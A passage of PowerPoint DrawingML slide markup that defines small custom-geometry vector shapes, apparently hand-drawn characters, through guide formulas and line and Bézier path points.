                    <a:gd name="T13" fmla="*/ 12 h 23"/>
                    <a:gd name="T14" fmla="*/ 2 w 14"/>
                    <a:gd name="T15" fmla="*/ 12 h 23"/>
                    <a:gd name="T16" fmla="*/ 2 w 14"/>
                    <a:gd name="T17" fmla="*/ 22 h 23"/>
                    <a:gd name="T18" fmla="*/ 14 w 14"/>
                    <a:gd name="T19" fmla="*/ 22 h 23"/>
                    <a:gd name="T20" fmla="*/ 14 w 14"/>
                    <a:gd name="T21" fmla="*/ 23 h 23"/>
                    <a:gd name="T22" fmla="*/ 0 w 14"/>
                    <a:gd name="T23" fmla="*/ 23 h 23"/>
                    <a:gd name="T24" fmla="*/ 0 w 14"/>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3">
                      <a:moveTo>
                        <a:pt x="0" y="0"/>
                      </a:moveTo>
                      <a:lnTo>
                        <a:pt x="14" y="0"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="14" y="3"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="2" y="3"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="2" y="10"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="14" y="10"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="14" y="12"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="2" y="12"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="2" y="22"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="14" y="22"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="14" y="23"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="0" y="2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73"/>
                <p:cNvSpPr>
                  <a:spLocks noEditPoints="1"/>
                </p:cNvSpPr>
                <p:nvPr userDrawn="1"/>
              </p:nvSpPr>
              <p:spPr bwMode="auto">
                <a:xfrm>
                  <a:off x="9458325" y="4502151"/>
                  <a:ext cx="4763" cy="30163"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 1 w 2"/>
                    <a:gd name="T1" fmla="*/ 0 h 13"/>
                    <a:gd name="T2" fmla="*/ 2 w 2"/>
                    <a:gd name="T3" fmla="*/ 1 h 13"/>
                    <a:gd name="T4" fmla="*/ 2 w 2"/>
                    <a:gd name="T5" fmla="*/ 1 h 13"/>
                    <a:gd name="T6" fmla="*/ 2 w 2"/>
                    <a:gd name="T7" fmla="*/ 2 h 13"/>
                    <a:gd name="T8" fmla="*/ 1 w 2"/>
                    <a:gd name="T9" fmla="*/ 3 h 13"/>
                    <a:gd name="T10" fmla="*/ 0 w 2"/>
                    <a:gd name="T11" fmla="*/ 2 h 13"/>
                    <a:gd name="T12" fmla="*/ 0 w 2"/>
                    <a:gd name="T13" fmla="*/ 1 h 13"/>
                    <a:gd name="T14" fmla="*/ 0 w 2"/>
                    <a:gd name="T15" fmla="*/ 1 h 13"/>
                    <a:gd name="T16" fmla="*/ 1 w 2"/>
                    <a:gd name="T17" fmla="*/ 0 h 13"/>
                    <a:gd name="T18" fmla="*/ 1 w 2"/>
                    <a:gd name="T19" fmla="*/ 10 h 13"/>
                    <a:gd name="T20" fmla="*/ 2 w 2"/>
                    <a:gd name="T21" fmla="*/ 10 h 13"/>
                    <a:gd name="T22" fmla="*/ 2 w 2"/>
                    <a:gd name="T23" fmla="*/ 11 h 13"/>
                    <a:gd name="T24" fmla="*/ 2 w 2"/>
                    <a:gd name="T25" fmla="*/ 12 h 13"/>
                    <a:gd name="T26" fmla="*/ 1 w 2"/>
                    <a:gd name="T27" fmla="*/ 13 h 13"/>
                    <a:gd name="T28" fmla="*/ 0 w 2"/>
                    <a:gd name="T29" fmla="*/ 12 h 13"/>
                    <a:gd name="T30" fmla="*/ 0 w 2"/>
                    <a:gd name="T31" fmla="*/ 11 h 13"/>
                    <a:gd name="T32" fmla="*/ 0 w 2"/>
                    <a:gd name="T33" fmla="*/ 10 h 13"/>
                    <a:gd name="T34" fmla="*/ 1 w 2"/>
                    <a:gd name="T3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13">
                      <a:moveTo>
                        <a:pt x="1" y="0"/>
                      </a:moveTo>
                      <a:cubicBezTo>
                        <a:pt x="1" y="0"/>
                        <a:pt x="2" y="0"/>
                        <a:pt x="2" y="1"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="2" y="1"/>
                        <a:pt x="2" y="1"/>
                        <a:pt x="2" y="1"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="2" y="2"/>
                        <a:pt x="2" y="2"/>
                        <a:pt x="2" y="2"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="2" y="3"/>
                        <a:pt x="1" y="3"/>
                        <a:pt x="1" y="3"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="1" y="3"/>
                        <a:pt x="0" y="3"/>
                        <a:pt x="0" y="2"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="0" y="2"/>
                        <a:pt x="0" y="2"/>
                        <a:pt x="0" y="1"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="0" y="1"/>
                        <a:pt x="0" y="1"/>
                        <a:pt x="0" y="1"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="0" y="0"/>
                        <a:pt x="1" y="0"/>
                        <a:pt x="1" y="0"/>
                      </a:cubicBezTo>
                      <a:close/>
                      <a:moveTo>
                        <a:pt x="1" y="10"/>
                      </a:moveTo>
                      <a:cubicBezTo>
                        <a:pt x="1" y="10"/>
                        <a:pt x="2" y="10"/>
                        <a:pt x="2" y="10"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="2" y="11"/>
                        <a:pt x="2" y="11"/>
                        <a:pt x="2" y="11"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="2" y="12"/>
                        <a:pt x="2" y="12"/>
                        <a:pt x="2" y="12"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="2" y="12"/>
                        <a:pt x="1" y="13"/>
                        <a:pt x="1" y="13"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="1" y="13"/>
                        <a:pt x="0" y="12"/>
                        <a:pt x="0" y="12"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="0" y="12"/>
                        <a:pt x="0" y="12"/>
                        <a:pt x="0" y="11"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="0" y="11"/>
                        <a:pt x="0" y="11"/>
                        <a:pt x="0" y="10"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="0" y="10"/>
                        <a:pt x="1" y="10"/>
                        <a:pt x="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74"/>
                <p:cNvSpPr>
                  <a:spLocks/>
                </p:cNvSpPr>
                <p:nvPr userDrawn="1"/>
              </p:nvSpPr>
              <p:spPr bwMode="auto">
                <a:xfrm>
                  <a:off x="9488488" y="4492626"/>
                  <a:ext cx="9525" cy="36513"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 1 w 6"/>
                    <a:gd name="T1" fmla="*/ 0 h 23"/>
                    <a:gd name="T2" fmla="*/ 6 w 6"/>
                    <a:gd name="T3" fmla="*/ 0 h 23"/>
                    <a:gd name="T4" fmla="*/ 6 w 6"/>
                    <a:gd name="T5" fmla="*/ 23 h 23"/>
                    <a:gd name="T6" fmla="*/ 4 w 6"/>
                    <a:gd name="T7" fmla="*/ 23 h 23"/>
                    <a:gd name="T8" fmla="*/ 4 w 6"/>
                    <a:gd name="T9" fmla="*/ 3 h 23"/>
                    <a:gd name="T10" fmla="*/ 0 w 6"/>
                    <a:gd name="T11" fmla="*/ 3 h 23"/>
                    <a:gd name="T12" fmla="*/ 1 w 6"/>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6" h="23">
                      <a:moveTo>
                        <a:pt x="1" y="0"/>
                      </a:moveTo>
                      <a:lnTo>
                        <a:pt x="6" y="0"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="6" y="23"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="4" y="23"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="4" y="3"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="0"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275"/>
                <p:cNvSpPr>
                  <a:spLocks/>
                </p:cNvSpPr>
                <p:nvPr userDrawn="1"/>
              </p:nvSpPr>
              <p:spPr bwMode="auto">
                <a:xfrm>
                  <a:off x="9513888" y="4492626"/>
                  <a:ext cx="22225" cy="39688"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 0 w 14"/>
                    <a:gd name="T1" fmla="*/ 0 h 25"/>
                    <a:gd name="T2" fmla="*/ 14 w 14"/>
                    <a:gd name="T3" fmla="*/ 0 h 25"/>
                    <a:gd name="T4" fmla="*/ 3 w 14"/>
                    <a:gd name="T5" fmla="*/ 25 h 25"/>
                    <a:gd name="T6" fmla="*/ 0 w 14"/>
                    <a:gd name="T7" fmla="*/ 23 h 25"/>
                    <a:gd name="T8" fmla="*/ 11 w 14"/>
                    <a:gd name="T9" fmla="*/ 3 h 25"/>
                    <a:gd name="T10" fmla="*/ 0 w 14"/>
                    <a:gd name="T11" fmla="*/ 3 h 25"/>
                    <a:gd name="T12" fmla="*/ 0 w 14"/>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14" h="25">
                      <a:moveTo>
                        <a:pt x="0" y="0"/>
                      </a:moveTo>
                      <a:lnTo>
                        <a:pt x="14" y="0"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="3" y="25"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="0" y="23"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="11" y="3"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="0"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276"/>
                <p:cNvSpPr>
                  <a:spLocks/>
                </p:cNvSpPr>
                <p:nvPr userDrawn="1"/>
              </p:nvSpPr>
              <p:spPr bwMode="auto">
                <a:xfrm>
                  <a:off x="9540875" y="4492626"/>
                  <a:ext cx="23813" cy="39688"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 2 w 10"/>
                    <a:gd name="T1" fmla="*/ 4 h 17"/>
                    <a:gd name="T2" fmla="*/ 0 w 10"/>
                    <a:gd name="T3" fmla="*/ 4 h 17"/>
                    <a:gd name="T4" fmla="*/ 2 w 10"/>
                    <a:gd name="T5" fmla="*/ 1 h 17"/>
                    <a:gd name="T6" fmla="*/ 5 w 10"/>
                    <a:gd name="T7" fmla="*/ 0 h 17"/>
                    <a:gd name="T8" fmla="*/ 7 w 10"/>
                    <a:gd name="T9" fmla="*/ 0 h 17"/>
                    <a:gd name="T10" fmla="*/ 9 w 10"/>
                    <a:gd name="T11" fmla="*/ 2 h 17"/>
                    <a:gd name="T12" fmla="*/ 9 w 10"/>
                    <a:gd name="T13" fmla="*/ 4 h 17"/>
                    <a:gd name="T14" fmla="*/ 7 w 10"/>
                    <a:gd name="T15" fmla="*/ 7 h 17"/>
                    <a:gd name="T16" fmla="*/ 9 w 10"/>
                    <a:gd name="T17" fmla="*/ 9 h 17"/>
                    <a:gd name="T18" fmla="*/ 10 w 10"/>
                    <a:gd name="T19" fmla="*/ 12 h 17"/>
                    <a:gd name="T20" fmla="*/ 10 w 10"/>
                    <a:gd name="T21" fmla="*/ 14 h 17"/>
                    <a:gd name="T22" fmla="*/ 8 w 10"/>
                    <a:gd name="T23" fmla="*/ 16 h 17"/>
                    <a:gd name="T24" fmla="*/ 5 w 10"/>
                    <a:gd name="T25" fmla="*/ 17 h 17"/>
                    <a:gd name="T26" fmla="*/ 1 w 10"/>
                    <a:gd name="T27" fmla="*/ 16 h 17"/>
                    <a:gd name="T28" fmla="*/ 0 w 10"/>
                    <a:gd name="T29" fmla="*/ 12 h 17"/>
                    <a:gd name="T30" fmla="*/ 1 w 10"/>
                    <a:gd name="T31" fmla="*/ 12 h 17"/>
                    <a:gd name="T32" fmla="*/ 2 w 10"/>
                    <a:gd name="T33" fmla="*/ 14 h 17"/>
                    <a:gd name="T34" fmla="*/ 5 w 10"/>
                    <a:gd name="T35" fmla="*/ 15 h 17"/>
                    <a:gd name="T36" fmla="*/ 8 w 10"/>
                    <a:gd name="T37" fmla="*/ 14 h 17"/>
                    <a:gd name="T38" fmla="*/ 9 w 10"/>
                    <a:gd name="T39" fmla="*/ 12 h 17"/>
                    <a:gd name="T40" fmla="*/ 8 w 10"/>
                    <a:gd name="T41" fmla="*/ 10 h 17"/>
                    <a:gd name="T42" fmla="*/ 7 w 10"/>
                    <a:gd name="T43" fmla="*/ 9 h 17"/>
                    <a:gd name="T44" fmla="*/ 4 w 10"/>
                    <a:gd name="T45" fmla="*/ 8 h 17"/>
                    <a:gd name="T46" fmla="*/ 4 w 10"/>
                    <a:gd name="T47" fmla="*/ 7 h 17"/>
                    <a:gd name="T48" fmla="*/ 6 w 10"/>
                    <a:gd name="T49" fmla="*/ 6 h 17"/>
                    <a:gd name="T50" fmla="*/ 7 w 10"/>
                    <a:gd name="T51" fmla="*/ 5 h 17"/>
                    <a:gd name="T52" fmla="*/ 8 w 10"/>
                    <a:gd name="T53" fmla="*/ 4 h 17"/>
                    <a:gd name="T54" fmla="*/ 7 w 10"/>
                    <a:gd name="T55" fmla="*/ 2 h 17"/>
                    <a:gd name="T56" fmla="*/ 5 w 10"/>
                    <a:gd name="T57" fmla="*/ 1 h 17"/>
                    <a:gd name="T58" fmla="*/ 3 w 10"/>
                    <a:gd name="T59" fmla="*/ 2 h 17"/>
                    <a:gd name="T60" fmla="*/ 2 w 10"/>
                    <a:gd name="T61"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 h="17">
                      <a:moveTo>
                        <a:pt x="2" y="4"/>
                      </a:moveTo>
                      <a:cubicBezTo>
                        <a:pt x="0" y="4"/>
                        <a:pt x="0" y="4"/>
                        <a:pt x="0" y="4"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="0" y="3"/>
                        <a:pt x="1" y="2"/>
                        <a:pt x="2" y="1"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="3" y="0"/>
                        <a:pt x="4" y="0"/>
                        <a:pt x="5" y="0"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="6" y="0"/>
                        <a:pt x="6" y="0"/>
                        <a:pt x="7" y="0"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="8" y="1"/>
                        <a:pt x="8" y="1"/>
                        <a:pt x="9" y="2"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="9" y="3"/>
                        <a:pt x="9" y="3"/>
                        <a:pt x="9" y="4"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="9" y="5"/>
                        <a:pt x="9" y="6"/>
                        <a:pt x="7" y="7"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="8" y="8"/>
                        <a:pt x="9" y="8"/>
                        <a:pt x="9" y="9"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="10" y="10"/>
                        <a:pt x="10" y="10"/>
                        <a:pt x="10" y="12"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="10" y="12"/>
                        <a:pt x="10" y="13"/>
                        <a:pt x="10" y="14"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="9" y="15"/>
                        <a:pt x="8" y="16"/>
                        <a:pt x="8" y="16"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="7" y="16"/>
                        <a:pt x="6" y="17"/>
                        <a:pt x="5" y="17"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="3" y="17"/>
                        <a:pt x="2" y="16"/>
                        <a:pt x="1" y="16"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="0" y="15"/>
                        <a:pt x="0" y="14"/>
                        <a:pt x="0" y="12"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="1" y="12"/>
                        <a:pt x="1" y="12"/>
                        <a:pt x="1" y="12"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="1" y="13"/>
                        <a:pt x="2" y="14"/>
                        <a:pt x="2" y="14"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="3" y="15"/>
                        <a:pt x="4" y="15"/>
                        <a:pt x="5" y="15"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="6" y="15"/>
                        <a:pt x="7" y="15"/>
                        <a:pt x="8" y="14"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="8" y="13"/>
                        <a:pt x="9" y="13"/>
                        <a:pt x="9" y="12"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="9" y="11"/>
                        <a:pt x="8" y="10"/>
                        <a:pt x="8" y="10"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="8" y="9"/>
                        <a:pt x="7" y="9"/>
                        <a:pt x="7" y="9"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="6" y="8"/>
                        <a:pt x="5" y="8"/>
                        <a:pt x="4" y="8"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="4" y="7"/>
                        <a:pt x="4" y="7"/>
                        <a:pt x="4" y="7"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="5" y="7"/>
                        <a:pt x="5" y="7"/>
                        <a:pt x="6" y="6"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="7" y="6"/>
                        <a:pt x="7" y="6"/>
                        <a:pt x="7" y="5"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="8" y="5"/>
                        <a:pt x="8" y="4"/>
                        <a:pt x="8" y="4"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="8" y="3"/>
                        <a:pt x="7" y="3"/>
                        <a:pt x="7" y="2"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="6" y="2"/>
                        <a:pt x="6" y="1"/>
                        <a:pt x="5" y="1"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="4" y="1"/>
                        <a:pt x="3" y="2"/>
                        <a:pt x="3" y="2"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="2" y="2"/>
                        <a:pt x="2"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277"/>
                <p:cNvSpPr>
                  <a:spLocks/>
                </p:cNvSpPr>
                <p:nvPr userDrawn="1"/>
              </p:nvSpPr>
              <p:spPr bwMode="auto">
                <a:xfrm>
                  <a:off x="9569450" y="4492626"/>
                  <a:ext cx="25400" cy="36513"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 2 w 11"/>
                    <a:gd name="T1" fmla="*/ 5 h 16"/>
                    <a:gd name="T2" fmla="*/ 0 w 11"/>
                    <a:gd name="T3" fmla="*/ 5 h 16"/>
                    <a:gd name="T4" fmla="*/ 2 w 11"/>
                    <a:gd name="T5" fmla="*/ 1 h 16"/>
                    <a:gd name="T6" fmla="*/ 5 w 11"/>
                    <a:gd name="T7" fmla="*/ 0 h 16"/>
                    <a:gd name="T8" fmla="*/ 9 w 11"/>
                    <a:gd name="T9" fmla="*/ 1 h 16"/>
                    <a:gd name="T10" fmla="*/ 10 w 11"/>
                    <a:gd name="T11" fmla="*/ 5 h 16"/>
                    <a:gd name="T12" fmla="*/ 10 w 11"/>
                    <a:gd name="T13" fmla="*/ 7 h 16"/>
                    <a:gd name="T14" fmla="*/ 7 w 11"/>
                    <a:gd name="T15" fmla="*/ 10 h 16"/>
                    <a:gd name="T16" fmla="*/ 3 w 11"/>
                    <a:gd name="T17" fmla="*/ 15 h 16"/>
                    <a:gd name="T18" fmla="*/ 11 w 11"/>
                    <a:gd name="T19" fmla="*/ 15 h 16"/>
                    <a:gd name="T20" fmla="*/ 11 w 11"/>
                    <a:gd name="T21" fmla="*/ 16 h 16"/>
                    <a:gd name="T22" fmla="*/ 0 w 11"/>
                    <a:gd name="T23" fmla="*/ 16 h 16"/>
                    <a:gd name="T24" fmla="*/ 6 w 11"/>
                    <a:gd name="T25" fmla="*/ 10 h 16"/>
                    <a:gd name="T26" fmla="*/ 8 w 11"/>
                    <a:gd name="T27" fmla="*/ 7 h 16"/>
                    <a:gd name="T28" fmla="*/ 9 w 11"/>
                    <a:gd name="T29" fmla="*/ 5 h 16"/>
                    <a:gd name="T30" fmla="*/ 8 w 11"/>
                    <a:gd name="T31" fmla="*/ 2 h 16"/>
                    <a:gd name="T32" fmla="*/ 5 w 11"/>
                    <a:gd name="T33" fmla="*/ 1 h 16"/>
                    <a:gd name="T34" fmla="*/ 3 w 11"/>
                    <a:gd name="T35" fmla="*/ 2 h 16"/>
                    <a:gd name="T36" fmla="*/ 2 w 11"/>
                    <a:gd name="T3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6">
                      <a:moveTo>
                        <a:pt x="2" y="5"/>
                      </a:moveTo>
                      <a:cubicBezTo>
                        <a:pt x="0" y="5"/>
                        <a:pt x="0" y="5"/>
                        <a:pt x="0" y="5"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="0" y="4"/>
                        <a:pt x="1" y="2"/>
                        <a:pt x="2" y="1"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="3" y="0"/>
                        <a:pt x="4" y="0"/>
                        <a:pt x="5" y="0"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="7" y="0"/>
                        <a:pt x="8" y="0"/>
                        <a:pt x="9" y="1"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="10" y="2"/>
                        <a:pt x="10" y="3"/>
                        <a:pt x="10" y="5"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="10" y="6"/>
                        <a:pt x="10" y="6"/>
                        <a:pt x="10" y="7"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="9" y="8"/>
                        <a:pt x="8" y="9"/>
                        <a:pt x="7" y="10"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="3" y="15"/>
                        <a:pt x="3" y="15"/>
                        <a:pt x="3" y="15"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="11" y="15"/>
                        <a:pt x="11" y="15"/>
                        <a:pt x="11" y="15"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="11" y="16"/>
                        <a:pt x="11" y="16"/>
                        <a:pt x="11" y="16"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="0" y="16"/>
                        <a:pt x="0" y="16"/>
                        <a:pt x="0" y="16"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="6" y="10"/>
                        <a:pt x="6" y="10"/>
                        <a:pt x="6" y="10"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="7" y="8"/>
                        <a:pt x="8" y="7"/>
                        <a:pt x="8" y="7"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="9" y="6"/>
                        <a:pt x="9" y="5"/>
                        <a:pt x="9" y="5"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="9" y="4"/>
                        <a:pt x="9" y="3"/>
                        <a:pt x="8" y="2"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="7" y="2"/>
                        <a:pt x="6" y="1"/>
                        <a:pt x="5" y="1"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="4" y="1"/>
                        <a:pt x="4" y="2"/>
                        <a:pt x="3" y="2"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="2" y="3"/>
                        <a:pt x="2" y="4"/>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278"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeArrowheads="1"/>
                </p:cNvSpPr>
                <p:nvPr userDrawn="1"/>
              </p:nvSpPr>
              <p:spPr bwMode="auto">
                <a:xfrm>
                  <a:off x="9596438" y="4516438"/>
                  <a:ext cx="142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279"/>
                <p:cNvSpPr>
                  <a:spLocks/>
                </p:cNvSpPr>
                <p:nvPr userDrawn="1"/>
              </p:nvSpPr>
              <p:spPr bwMode="auto">
                <a:xfrm>
                  <a:off x="9615488" y="4492626"/>
                  <a:ext cx="22225" cy="36513"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 1 w 10"/>
                    <a:gd name="T1" fmla="*/ 5 h 16"/>
                    <a:gd name="T2" fmla="*/ 0 w 10"/>
                    <a:gd name="T3" fmla="*/ 5 h 16"/>
                    <a:gd name="T4" fmla="*/ 1 w 10"/>
                    <a:gd name="T5" fmla="*/ 1 h 16"/>
                    <a:gd name="T6" fmla="*/ 5 w 10"/>
                    <a:gd name="T7" fmla="*/ 0 h 16"/>
                    <a:gd name="T8" fmla="*/ 9 w 10"/>
                    <a:gd name="T9" fmla="*/ 1 h 16"/>
                    <a:gd name="T10" fmla="*/ 10 w 10"/>
                    <a:gd name="T11" fmla="*/ 5 h 16"/>
                    <a:gd name="T12" fmla="*/ 10 w 10"/>
                    <a:gd name="T13" fmla="*/ 7 h 16"/>
                    <a:gd name="T14" fmla="*/ 7 w 10"/>
                    <a:gd name="T15" fmla="*/ 10 h 16"/>
                    <a:gd name="T16" fmla="*/ 3 w 10"/>
                    <a:gd name="T17" fmla="*/ 15 h 16"/>
                    <a:gd name="T18" fmla="*/ 10 w 10"/>
                    <a:gd name="T19" fmla="*/ 15 h 16"/>
                    <a:gd name="T20" fmla="*/ 10 w 10"/>
                    <a:gd name="T21" fmla="*/ 16 h 16"/>
                    <a:gd name="T22" fmla="*/ 0 w 10"/>
                    <a:gd name="T23" fmla="*/ 16 h 16"/>
                    <a:gd name="T24" fmla="*/ 6 w 10"/>
                    <a:gd name="T25" fmla="*/ 10 h 16"/>
                    <a:gd name="T26" fmla="*/ 8 w 10"/>
                    <a:gd name="T27" fmla="*/ 7 h 16"/>
                    <a:gd name="T28" fmla="*/ 9 w 10"/>
                    <a:gd name="T29" fmla="*/ 5 h 16"/>
                    <a:gd name="T30" fmla="*/ 8 w 10"/>
                    <a:gd name="T31" fmla="*/ 2 h 16"/>
                    <a:gd name="T32" fmla="*/ 5 w 10"/>
                    <a:gd name="T33" fmla="*/ 1 h 16"/>
                    <a:gd name="T34" fmla="*/ 3 w 10"/>
                    <a:gd name="T35" fmla="*/ 2 h 16"/>
                    <a:gd name="T36" fmla="*/ 1 w 10"/>
                    <a:gd name="T3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6">
                      <a:moveTo>
                        <a:pt x="1" y="5"/>
                      </a:moveTo>
                      <a:cubicBezTo>
                        <a:pt x="0" y="5"/>
                        <a:pt x="0" y="5"/>
                        <a:pt x="0" y="5"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="0" y="4"/>
                        <a:pt x="0" y="2"/>
                        <a:pt x="1" y="1"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="3" y="0"/>
                        <a:pt x="4" y="0"/>
                        <a:pt x="5" y="0"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="7" y="0"/>
                        <a:pt x="8" y="0"/>
                        <a:pt x="9" y="1"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="10" y="2"/>
                        <a:pt x="10" y="3"/>
                        <a:pt x="10" y="5"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="10" y="6"/>
                        <a:pt x="10" y="6"/>
                        <a:pt x="10" y="7"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="9" y="8"/>
                        <a:pt x="8" y="9"/>
                        <a:pt x="7" y="10"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="3" y="15"/>
                        <a:pt x="3" y="15"/>
                        <a:pt x="3" y="15"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="10" y="15"/>
                        <a:pt x="10" y="15"/>
                        <a:pt x="10" y="15"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="10" y="16"/>
                        <a:pt x="10" y="16"/>
                        <a:pt x="10" y="16"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="0" y="16"/>
                        <a:pt x="0" y="16"/>
                        <a:pt x="0" y="16"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="6" y="10"/>
                        <a:pt x="6" y="10"/>
                        <a:pt x="6" y="10"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="7" y="8"/>
                        <a:pt x="8" y="7"/>
                        <a:pt x="8" y="7"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="8" y="6"/>
                        <a:pt x="9" y="5"/>
                        <a:pt x="9" y="5"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="9" y="4"/>
                        <a:pt x="8" y="3"/>
                        <a:pt x="8" y="2"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="7" y="2"/>
                        <a:pt x="6" y="1"/>
                        <a:pt x="5" y="1"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="4" y="1"/>
